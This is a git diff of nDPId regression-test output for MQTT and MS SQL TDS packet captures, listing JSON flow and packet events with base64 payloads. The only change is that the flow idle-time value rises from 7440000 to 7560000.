-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1643014009283,"flow_last_seen":1643014010972,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
+00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014009283,"flow_last_seen":1643014009283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643014009283,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643014009283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1643014009283,"pkt":"AAAAAAAAAAwATSywCABFAAA8AABAADQGcggKCgoBwKgAAQdbo6QZpJjZwwPwU6AS\/oijvAAAAgQFtAQCCArcK3DSu1+3wwEDAwc="} +00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643014009286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":132,"pkt_l4_len":98,"thread_ts_msec":1643014009286,"pkt":"AAAAAAAAAAwATSywCABFAAB2fFxAAD8G6nHAqAABCgoKAaOkB1vDA\/BTGaSY2oAYAOXxcQAAAQEICrtfuBTcK3DSEEAABk1RSXNkcAPCABQAFmNiYWFiY2JhYmFjYmJiYmJhYWFhYWIADDAyRDUwNTAyMjNEMwAMMDJENTA1MDIyM0Qz"} 
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643014009283,"flow_last_seen":1643014009286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1643014009286,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643014009367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1643014009367,"pkt":"AAAAAAAAAAwATSywCABFAABUfF1AAD8G6pLAqAABCgoKAaOkB1vDA\/CVGaSY2oAYAOUsbgAAAQEICrtfuGXcK3Ejgh4AAQAZYXN0ci9zNzIwLzAyRDUwNTAyMjNEMy85OQA="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643014349216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":355,"pkt_l4_len":317,"thread_ts_msec":1643014349216,"pkt":"AAAAAAAAAAIAAAAIgQAD8AgARQABUdTzQABABowKZEMj7jOJHO+I2wdbWSC31VrTd7uAGAGz9SgAAAEBCAoAXWNEhxKKyRCaAgAETVFUVATAAlgAEFA0Nzc3NUlEMTcwVzIxMjAASmlvdGF6ZXdwbWxpdGh1Yi5henVyZS1kZXZpY2VzLm5ldC9QNDc3NzVJRDE3MFcyMTIwLz9hcGktdmVyc2lvbj0yMDE4LTA2LTMwALBTaGFyZWRBY2Nlc3NTaWduYXR1cmUgc2lnPUtVNFVpQlRmV2UlMkZ4cyUyQmdURzVXUURMdnpyUHg0VTYySFRwU2xma2Z4cmZRJTNEJnNlPTE2NDMwMTc5NDcmc3I9aW90YXpld3BtbGl0aHViLmF6dXJlLWRldmljZXMubmV0JTJGUDQ3Nzc1SUQxNzBXMjEyMCUyRiUzRmFwaS12ZXJzaW9uJTNEMjAxOC0wNi0zMA=="} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1643014009283,"flow_last_seen":1643014010972,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 00546{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":9,"total-skipped-flows":0,"total-l4-data-len":875,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1643014349216} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 9/9 
diff --git a/test/results/mssql_tds.pcap.out b/test/results/mssql_tds.pcap.out index 33315ceb2..8bc119e24 100644 --- a/test/results/mssql_tds.pcap.out +++ b/test/results/mssql_tds.pcap.out 
@@ -1,62 +1,62 @@ 00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mssql_tds.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1240877917888} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1240877917888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1240877917888,"pkt":"AAwpiUrKAFBWwAABCABFAADynIJAAEAGGaUKb29vCgAAAQRXBZk+5C72WSFQkoAYAFx5qQAAAQEICgQLsN8AAVvMAQEAvgAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAIABzAGUAdAAgAHQAcgBhAG4AcwBhAGMAdABpAG8AbgAgAGkAcwBvAGwAYQB0AGkAbwBuACAAbABlAHYAZQBsACAAIAByAGUAYQBkACAAYwBvAG0AbQBpAHQAdABlAGQAIAAgAHMAZQB0ACAAaQBtAHAAbABpAGMAaQB0AF8AdAByAGEAbgBzAGEAYwB0AGkAbwBuAHMAIABvAGYAZgAgAA=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1240877917888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1240877917888,"pkt":"AFBWwAABAAwpiUrKCABFAABWA25AAIAGc1UKAAABCm9vbwWZBFdZIVCSPuQvtIAYQa2\/wgAAAQEICgABW8wEC7DfBAEAIgA1AQD9AQD5AAAAAAAAAAAA\/QAAugAAAAAAAAAAAA=="} 
-00863{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1240877917918,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":358,"pkt_l4_len":324,"thread_ts_msec":1240877917918,"pkt":"AAwpiUrKAFBWwAABCABFAAFYnINAAEAGGT4Kb29vCgAAAQRXBZk+5C+0WSFQtIAYAFxIvAAAAQEICgQLsOcAAVvMAwEBJAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAA\/\/8NAAAAAAEmBAQAAAAAAADnQB8JBNAANDQAQABQADAAIABuAHYAYQByAGMAaABhAHIAKAA0ADAAMAAwACkALABAAFAAMQAgAGkAbgB0AAAA50AfCQTQADSQAHMAZQBsAGUAYwB0ACAAKgAgAGYAcgBvAG0AIAB0AGUAcwB0AF8AdABhAGIAbABlAF8AMQAgAHcAaABlAHIAZQAgAG4AYQBtAGUAIAA9ACAAQABQADAAIABhAG4AZAAgAGkAZAAgAD0AIABAAFAAMQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAAAA50AfCQTQADQGAHoAegB6AAAAJgQEAgAAAA=="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7560000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1240877917888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1240877917888,"pkt":"AAwpiUrKAFBWwAABCABFAADynIJAAEAGGaUKb29vCgAAAQRXBZk+5C72WSFQkoAYAFx5qQAAAQEICgQLsN8AAVvMAQEAvgAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAIABzAGUAdAAgAHQAcgBhAG4AcwBhAGMAdABpAG8AbgAgAGkAcwBvAGwAYQB0AGkAbwBuACAAbABlAHYAZQBsACAAIAByAGUAYQBkACAAYwBvAG0AbQBpAHQAdABlAGQAIAAgAHMAZQB0ACAAaQBtAHAAbABpAGMAaQB0AF8AdAByAGEAbgBzAGEAYwB0AGkAbwBuAHMAIABvAGYAZgAgAA=="} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7560000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1240877917888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1240877917888,"pkt":"AFBWwAABAAwpiUrKCABFAABWA25AAIAGc1UKAAABCm9vbwWZBFdZIVCSPuQvtIAYQa2\/wgAAAQEICgABW8wEC7DfBAEAIgA1AQD9AQD5AAAAAAAAAAAA\/QAAugAAAAAAAAAAAA=="} 
+00863{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1240877917918,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":358,"pkt_l4_len":324,"thread_ts_msec":1240877917918,"pkt":"AAwpiUrKAFBWwAABCABFAAFYnINAAEAGGT4Kb29vCgAAAQRXBZk+5C+0WSFQtIAYAFxIvAAAAQEICgQLsOcAAVvMAwEBJAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAA\/\/8NAAAAAAEmBAQAAAAAAADnQB8JBNAANDQAQABQADAAIABuAHYAYQByAGMAaABhAHIAKAA0ADAAMAAwACkALABAAFAAMQAgAGkAbgB0AAAA50AfCQTQADSQAHMAZQBsAGUAYwB0ACAAKgAgAGYAcgBvAG0AIAB0AGUAcwB0AF8AdABhAGIAbABlAF8AMQAgAHcAaABlAHIAZQAgAG4AYQBtAGUAIAA9ACAAQABQADAAIABhAG4AZAAgAGkAZAAgAD0AIABAAFAAMQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAAAA50AfCQTQADQGAHoAegB6AAAAJgQEAgAAAA=="} 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":4,"total-skipped-flows":0,"total-l4-data-len":874,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1259762400004} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1259762400004,"pkt":"ABj+dhvGERERERESCABFAABUAAdAAEAGtr4Kb29vCgAAAQiuBZn\/ymPG\/zlOU1AYEAArKgAAAQEALAAAAQBDAE8ATQBNAEkAVAAgAFQAUgBBAE4AUwBBAEMAVABJAE8ATgA="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1259762400004,"pkt":"ABj+dhvGERERERESCABFAAA5AAhAAEAGttgKAAABCm9vbwWZCK7\/OU5T\/8pj8lAYEABYKQAABAEAEQE6AQD9AADVAAAAAAA="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1259762400022,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1259762400022,"pkt":"ABj+dhvGERERERESCABFAADhAAlAAEAGti8Kb29vCgAAAQ0FBZmoWe0S76GBTlAYEAB74gAAAwkAuQAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAADgBwAF8ARwBlAHQAQgBvAGcAdQBzAEQAYQB0AGEAAAALQABTAGUAYQByAGMAaABUAHkAcABlAAAmAQEBFUAATQBhAHgAVwBhAGkAdABUAGkAbQBlAEkAbgBTAGUAYwBvAG4AZABzAAAmBAQAAAAAE0AAUAByAG8AYwBlAHMAcwBOAGUAZwBhAHQAaQB2AGUAQQBjAGsAACYBAQA="} 
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7440000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1259762400033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1136,"pkt_l4_len":1102,"thread_ts_msec":1259762400033,"pkt":"ABj+dhvGERERERESCABFAARiAAxAAEAGsqsKb29vCgAAARFcBZmNJzZmudpdulAYEAAslQAAAwkEOgAAAQANAHMAcABfAGUAeABlAGMAdQB0AGUAcwBxAGwAAgAAAOemAwkE0AA0pgNTAEUATABFAEMAVAAgAFQATwBQACAAOAA4ACAAWwBkAGIAbwBdAC4AWwBNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAXQAuAFsASQBEAF0ALAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEUAbgB0AGkAdAB5AEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBIAGkAcwB0AG8AcgB5AEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBUAHkAcABlAEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBWAGUAcgBzAGkAbwBuAF0ALAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEgAYQBuAGQAbABpAG4AZwBTAHQAYQB0AHUAcwBdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBPAHAAZQByAGEAdABpAG8AbgBUAHkAcABlAEkARABdACAARgBSAE8ATQAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0AIAAgAFcASABFAFIARQAgACgAIAAoACAAKAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEgAYQBuAGQAbABpAG4AZwBTAHQAYQB0AHUAcwBdACAAPQAgAEAASABhAG4AZABsAGkAbgBnAFMAdABhAHQAdQBzADEAKQApACkAIABPAFIARABFAFIAIABCAFkAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBWAGUAcgBzAGkAbwBuAF0AIABBAFMAQwAsAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEkARABdACAAQQBTAEMAAADnMAAJBNAANDAAQABIAGEAbgBkAGwAaQBuAGcAUwB0AGEAdAB1AHMAMQAgAHQAaQBuAHkAaQBuAHQAEEAASABhAG4AZABsAGkAbgBnAFMAdABhAHQAdQBzADEAACYBAQA="} 
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7440000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 